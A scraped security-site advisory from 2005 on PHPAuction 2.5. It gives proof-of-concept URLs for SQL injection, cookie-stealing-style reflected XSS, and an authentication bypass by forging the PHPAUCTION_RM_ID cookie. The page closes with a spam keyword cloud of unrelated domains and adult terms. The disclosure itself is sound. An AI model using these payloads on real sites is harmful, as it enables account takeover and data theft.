about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPAuction Multiple Vulnerabilities


Title PHPAuction Multiple Vulnerabilities
Published 2005-07-07-12:00AM
Updated 2005-07-07-05:25PM
Class Unknown
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to <dcrab@hackerscenter.com>.
Vulnerable  PHPAuction PHPAuction 2.5
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept examples are available:

SQL Injection:
/phpauction-gpl-2.5/adsearch.php?title=1&desc=on&closed=on&category='SQL_INJECTION&minprice=1&maxprice=1&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=
on&seller=1&country=Afghanistan&ending=1&SortProperty=ends&type=2&action=search&go=GO%20%3E%3E

/viewnews.php?id='SQL_INJECTION

Cross-site scripting:
/phpauction-gpl-2.5/index.php?lan=<script>alert(document.cookie)</script>

/phpauction-gpl-2.5/profile.php?user_id=158&auction_id=<script>alert(document.cookie)</script>

/phpauction-gpl-2.5/profile.php?auction_id=<script>alert(document.cookie)</script>&id=159

/phpauction-gpl-2.5/admin/index.php?lan=<script>alert(document.cookie)</script>

/login.php?username=<script>alert(document.cookie)</script>

/viewnews.php?id=<script>alert(document.cookie)</script>

Authentication bypass:

Set the cookie as follows:
Name: PHPAUCTION_RM_ID
VALUE: Id number of the user/admin you want to impersonate (you can get it from thier profile)
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 10:49:34 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Tagger LE. /data/vuln Tagger LE. PHPKIT www.xxl.cx download t cnjunshi.b PHPKIT tamil sex spider man gaoyyq.cn gaoyyq.cn vidio mesu www.dnjxw. guest+book news for c gaoyyq.cn Launcher www.sex.tv WWW.Pink w filmale gaoyyq.cn invisison invision p zhqu.com www.80845. www.jphmob 200 /compo www.doudou mark hoppu tee news for c Microsoft 50 sent filmale leonscorne orgasmica jenna jame www.downlo Galena por CARMELLA B Www.kingsv www.tianya phpBB por www.nikepi news for c www.yxnet. vibiosexy paris hill Maureen La